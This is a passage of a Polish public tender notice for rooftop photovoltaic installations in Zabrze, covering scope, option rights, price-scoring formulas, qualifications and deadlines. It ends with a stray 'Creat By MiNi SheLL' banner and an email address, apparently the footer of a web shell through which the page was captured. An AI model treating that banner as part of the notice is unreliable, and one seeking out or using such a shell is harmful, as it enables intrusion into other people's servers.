fotowoltaicznej wraz wpięciem w obwód istniejącego wyłącznika P-poż<br/>e.	dostawa i montaż inwertera o mocy 20 kW <br/>f.	instalacja odgromowa<br/>g.	dostawa i montaż 33 paneli fotowoltaicznych (wraz z konstrukcją) o mocy min 0,4 kW/panel i sumarycznej mocy min. 13,2 kW.<br/>h. wykonanie dokumentacji powykonawczej (w 3-ch egzemplarzach) zawierającej dokumentację z naniesionymi w trakcie budowy zmianami, komplet protokołów prób i pomiarów, karty zatwierdzenia materiałów. <br/><br/>Ponadto:<br/>a.	Wykonawca ma obowiązek wykonania niezbędnych zgłoszeń do odpowiednich organów państwowych, w szczególności do Powiatowego Inspektora Nadzoru Budowlanego; Śląskiego Wojewódzkiego Konserwatora Zabytków.<br/>b.	Przez okres realizacji zamówienia, na terenie przyległym prowadzony będzie ruch turystyczny. Obszar realizacji prac należy tak zorganizować, aby zapewnić zwiedzającym stały dostęp do wszystkich obiektów podlegających zwiedzaniu, a jednocześnie zabezpieczyć teren prac przed dostępem osób postronnych.<br/><br/>Wykonawca powinien tak zorganizować dostawę i montaż instalacji fotowoltaicznej, aby umożliwić normalne korzystanie z obiektu.<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja techniczna – załącznik nr 5/2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">31712331-9 - Fotoogniwa</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający w ramach zamówienia na Zadanie 2 przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy.<br/>1)	Zamówienie do udzielenia w ramach prawa opcji, polegać będzie na dostawie i montażu dodatkowych 41 paneli fotowoltaicznych wraz konstrukcją o mocy min 0,4 kW/panel i sumarycznej mocy min. 16,4 kW (identycznych jak zaproponowane w zakresie podstawowym) – zgodnie z opisem zawartym w załączniku nr 5/2 do SWZ).<br/>2)	Wartość zamówienia przewidzianego do udzielenia w ramach prawa opcji wyniesie [zgodnie z ofertą] zł. <br/>3)	Przystąpienie do realizacji zamówienia w części dotyczącej zakresu objętego prawem opcji uzależnione jest od decyzji Zamawiającego podjętej na zasadach i terminach wskazanych w projektowanych postanowieniach umowy. <br/>4)	Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) zaciąganego w momencie zawarcia umowy a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. <br/>Jednakże, w przypadku skorzystania z prawa opcji, Zamawiający zrealizuje zakres zamówienia opcjonalnego w całości. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena oferty”(oznaczonego jako „C” ) Zamawiający przyzna maksymalnie 100 pkt. Oferty w tym kryterium będą oceniane w dwóch podkryteriach:<br/>a)	Podkryterium nr 1 – cena brutto dla zakresu podstawowego zamówienia (oznaczone jako „CP”). W ramach podkryterium „CP” oferta z najniższą ceną brutto dla zakresu podstawowego zamówienia uzyska 76 pkt . Pozostałe oferty otrzymają punkty w tym podkryterium w ilości proporcjonalnie mniejszej,<br/>wyliczonej według wzoru:<br/> CNP<br/>CP = ----------- x 76<br/> CBP<br/>gdzie: <br/>CP – liczba punktów Cena za zakres podstawowy,<br/>CNP – najniższa zaoferowana cena dla zakresu podstawowego,<br/>CBP – cena oferty badanej dla zakresu podstawowego.<br/>b) Podkryterium nr 2 – cena brutto dla zakresu objętego prawem opcji w zakresie przewidzianym przez Zamawiającego w pkt.1.2.4 Rozdziału II SWZ („CO”). W ramach podkryterium „CO” oferta z najniższą ceną brutto dla zakresu objętego prawem opcji uzyska 24 pkt. Pozostałe oferty otrzymają punkty w tym podkryterium w ilości proporcjonalnie mniejszej, wyliczonej według wzoru::<br/> CNO<br/>CO = ----------- x 24<br/> CBO<br/>gdzie: <br/>CO – liczba punktów Cena za zakres objęty prawem opcji <br/>CNO – najniższa zaoferowana cena dla zakresu objętego prawem opcji,<br/>CBO – cena oferty badanej dla zakresu objętego prawem opcji.<br/>c)	Po ocenie ofert w ramach przewidzianych podkryteriów opisanych wskaźnikami: „CP” i „CO”, o których mowa powyżej, poszczególne oferty otrzymują sumę punktów przyznaną w ramach kryterium „cena oferty”, zgodnie ze wzorem:<br/>C = CP + CO<br/>d) Punkty w podkryteriach opisanych wskaźnikami „CP” i „CO” zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>e) Za ofertę najkorzystniejszą będzie uznana oferta, która nie podlega odrzuceniu i otrzyma najwyższą punktację.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3:<br/>1. Przedmiot zamówienia obejmuje wykonanie instalacji fotowoltaicznej na obiekcie: <br/>- Budynek obsługi ruchu turystycznego ul Mochnackiego 2, 41-800 Zabrze.<br/>2. Stan obecny: budynek jednokondygnacyjny, murowany, dach płaski pokryty papą. Na dachu znajdują się urządzenia niezbędne z punktu widzenia funkcjonowania budynku takie jak: kominy, centrale klimatyzacyjne, wywietrzniki itp. Obecnie budynek nie posiada instalacji fotowoltaicznej. Budynek posiada podłączenie do wewnętrznej instalacji elektroenergetycznej o napięciu 400V. Budynek posiada rozdzielnię główną oraz wyłącznik p-poż.<br/><br/>3. W zakresie przedmiotu zamówienia jest:<br/>a.	dostawa i montaż inwertera o mocy 15 kW <br/>b.	dostawa i montaż okablowania pod stronie DC<br/>c.	dostawa montaż okablowania po stronie AC<br/>d.	wyłącznik P-poz wraz wpięciem w obwód istniejącego wyłącznika P-poż<br/>e.	instalacja odgromowa<br/>f.	dostawa i montaż 31 paneli fotowoltaicznych (wraz z konstrukcją) o mocy min 0,4 kW/panel i sumarycznej mocy min. 12,4 kW<br/>g. wykonanie dokumentacji powykonawczej (w 3-ch egzemplarzach) zawierającej dokumentację z naniesionymi w trakcie budowy zmianami, komplet protokołów prób i pomiarów, karty zatwierdzenia materiałów.<br/><br/>Przez okres trwania realizacji zamówienia, na terenie przyległym prowadzony będzie ruch turystyczny. Obszar realizacji prac należy tak zorganizować, aby zapewnić zwiedzającym stały dostęp do wszystkich obiektów podlegających zwiedzaniu oraz wydzielić strefy montażu w sposób uniemożliwiający dostęp osobom postronnym.<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja techniczna – załącznik nr 5/3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">31712331-9 - Fotoogniwa</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający w ramach zamówienia na Zadanie 3 przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy.<br/>1)	Zamówienie do udzielenia w ramach prawa opcji, polegać będzie na dostawie i montażu dodatkowych 14 paneli fotowoltaicznych wraz konstrukcją o mocy min 0,4 kW/panel i sumarycznej mocy min. 5,6 kW (identycznych jak zaproponowane w zakresie podstawowym) – zgodnie z opisem zawartym w załączniku nr 5/3 do SWZ).<br/>2)	Wartość zamówienia przewidzianego do udzielenia w ramach prawa opcji wyniesie [zgodnie z ofertą] zł. <br/>3)	Przystąpienie do realizacji zamówienia w części dotyczącej zakresu objętego prawem opcji uzależnione jest od decyzji Zamawiającego podjętej na zasadach i terminach wskazanych w projektowanych postanowieniach umowy. <br/>4)	Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) zaciąganego w momencie zawarcia umowy a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. <br/>Jednakże, w przypadku skorzystania z prawa opcji, Zamawiający zrealizuje zakres zamówienia opcjonalnego w całości. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena oferty”(oznaczonego jako „C” ) Zamawiający przyzna maksymalnie 100 pkt. Oferty w tym kryterium będą oceniane w dwóch podkryteriach:<br/>a)	Podkryterium nr 1 – cena brutto dla zakresu podstawowego zamówienia (oznaczone jako „CP”). W ramach podkryterium „CP” oferta z najniższą ceną brutto dla zakresu podstawowego zamówienia uzyska 90 pkt . Pozostałe oferty otrzymają punkty w tym podkryterium w ilości proporcjonalnie mniejszej,<br/>wyliczonej według wzoru:<br/> CNP<br/>CP = ----------- x 90<br/> CBP<br/>gdzie: <br/>CP – liczba punktów Cena za zakres podstawowy,<br/>CNP – najniższa zaoferowana cena dla zakresu podstawowego,<br/>CBP – cena oferty badanej dla zakresu podstawowego.<br/>b) Podkryterium nr 2 – cena brutto dla zakresu objętego prawem opcji w zakresie przewidzianym przez Zamawiającego w pkt.1.3.4 Rozdziału II SWZ („CO”). W ramach podkryterium „CO” oferta z najniższą ceną brutto dla zakresu objętego prawem opcji uzyska 10 pkt. Pozostałe oferty otrzymają punkty w tym podkryterium w ilości proporcjonalnie mniejszej, wyliczonej według wzoru::<br/> CNO<br/>CO = ----------- x 10<br/> CBO<br/>gdzie: <br/>CO – liczba punktów Cena za zakres objęty prawem opcji <br/>CNO – najniższa zaoferowana cena dla zakresu objętego prawem opcji,<br/>CBO – cena oferty badanej dla zakresu objętego prawem opcji.<br/>c)	Po ocenie ofert w ramach przewidzianych podkryteriów opisanych wskaźnikami: „CP” i „CO”, o których mowa powyżej, poszczególne oferty otrzymują sumę punktów przyznaną w ramach kryterium „cena oferty”, zgodnie ze wzorem:<br/>C = CP + CO<br/>d) Punkty w podkryteriach opisanych wskaźnikami „CP” i „CO” zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>e) Za ofertę najkorzystniejszą będzie uznana oferta, która nie podlega odrzuceniu i otrzyma najwyższą punktację.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>zdolności technicznej lub zawodowej – dotyczy Zadania 2:<br/>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobą zdolną do wykonania zamówienia, tj. min. 1 osobą pełniącą funkcję Kierownika budowy:<br/>- posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej zgodnie z ustawą Prawo budowlane (Dz.U.2021.2351 t.j. ze zm.) lub odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem będą pozwalać na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalności;<br/>- oraz, która zgodnie z art. 37 c Ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (Dz. U.2022 r., poz. 840), przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">OŚWIADCZENIA I DOKUMENTY SKŁADANE NA WEZWANIE – DOTYCZY ZADANIA 2:<br/>Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>- wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wzór wykazu osób stanowi załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty Wykonawca zobowiązany jest załączyć:<br/>1)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania,<br/>2)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w pkt 1),<br/>3)	zobowiązanie, o którym mowa w rozdziale I, sekcja 5 ust. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach podmiotu udostepniającego zasób Wykonawcy,<br/>4)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postepowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>-	postępowania o zamówienie publicznego, którego dotyczy,<br/>-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>-	ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>b)	oświadczenie, o którym mowa w rozdziale I sekcja 4 ust. 4.4 SWZ (Zamawiający dopuszcza złożenia tego oświadczenia na formularzu ofertowym);<br/>5)	zestawienie materiałów równoważnych, o ile Wykonawca zastosował rozwiązania równoważne.<br/>2.	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 1 pkt. 1), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>3.	Zapisy ust. 1 pkt 2) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	Zapisy ust. 1 pkt 1) i pkt 2), ust. 2 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje dostawy, do których realizacji te uprawnienia są wymagane.<br/>3.	W przypadku, o którym mowa w ust. 2 wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmian umowy, o których mowa w art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, które mogą dotyczyć:<br/>a.	terminu realizacji - jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia realizacji przedmiotu Umowy będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego udostępnienia obiektu będącego obszarem prac, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie Terminu wykonania przedmiotu Umowy,<br/>b.	terminu realizacji - gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie przedmiotu Umowy, w szczególności z powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,<br/>c.	terminu realizacji – z powodu uzasadnionych zmian w zakresie zaproponowanych <br/>w Dokumentacji projektowej rozwiązań technicznych oraz sposobu wykonania przedmiotu Umowy wnioskowanych przez Wykonawcę lub Zamawiającego, jeżeli te zmiany spowodują obniżenie kosztów wykonania przedmiotu Umowy, kosztów eksploatacji lub skrócenie terminu realizacji przedmiotu Umowy, a także podniesienie wartości, sprawności, walorów użytkowych, wydajności i bezpieczeństwa infrastruktury,<br/>d.	terminu realizacji - z powodu zmiany przepisów prawnych istotnych dla realizacji przedmiotu Umowy mających wpływ na zakres lub Termin wykonania Umowy w zakresie niezbędnym do dostosowania się do nowych przepisów,<br/>e.	terminu realizacji – w przypadku wystąpienia niebezpieczeństwa kolizji z innymi równolegle prowadzonymi przez Zamawiającego lub inne podmioty inwestycjami lub pracami, w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>f.	terminu realizacji – ze względu na działania organów administracji lub gestorów sieci skutkujących niezależnym od Wykonawcy wydłużeniem terminów realizacji określonych czynności objętych zakresem umowy, wydawania decyzji, zezwoleń, uzgodnień lub odmową wydania przez w/w podmioty wymaganych decyzji, zezwoleń, uzgodnień itp.,<br/>g.	terminu realizacji – ze względu na wystąpienie siły wyższej przez którą rozumie się zdarzenie bądź połączenie nadzwyczajnych zdarzeń niezależnych od stron umowy, które zasadniczo utrudniają lub uniemożliwiają wykonywanie zobowiązań wynikających z umowy, których nie można było przewidzieć oraz którym nie można było zapobiec, a także ich przezwyciężyć poprzez działanie z należytą starannością i które nie mogły być znane w terminie złożenia oferty na podstawie której zawarto umowę. W szczególności przez siłę wyższą rozumie się zdarzenia lub połączenie zdarzeń takich jak: pożar, powódź, atak terrorystyczny, klęski żywiołowe, pandemie i epidemie, akt władzy publicznej któremu należy się bezwzględnie podporządkować, wydarzenia powodujące nadzwyczajne zaburzenia życia zbiorowego.<br/>h.	terminu realizacji – ze względu na uwarunkowania wynikające z działalności prowadzonej przez Zamawiającego na bazie infrastruktury będącej przedmiotem inwestycji. <br/>i.	wynagrodzenia - z powodu uzasadnionych zmian w zakresie zaproponowanych w Dokumentacji projektowej rozwiązań technicznych oraz sposobu wykonania przedmiotu Umowy wnioskowanych przez Wykonawcę lub Zamawiającego, jeżeli te zmiany spowodują obniżenie kosztów wykonania lub/i kosztów eksploatacji lub/i skrócenie terminu realizacji przedmiotu Umowy lub/i podniesienie wartości/sprawności/walorów użytkowych/wydajności i bezpieczeństwa infrastruktury.<br/>2.	Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego <br/>i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-27 19:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy złożyć za pośrednictwem Platformy pod adresem: https://platforma.eb2b.com.pl lub https://xx.eb2b.com.pl przy użyciu zakładki „Złóż ofertę”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-27 20:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia:<br/>Termin realizacji zadania – nie później niż 30 dni kalendarzowych od dnia wezwania do realizacji zadania. <br/>Wezwanie nastąpi – nie później niż w ciągu 60 dni kalendarzowych od dnia podpisania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com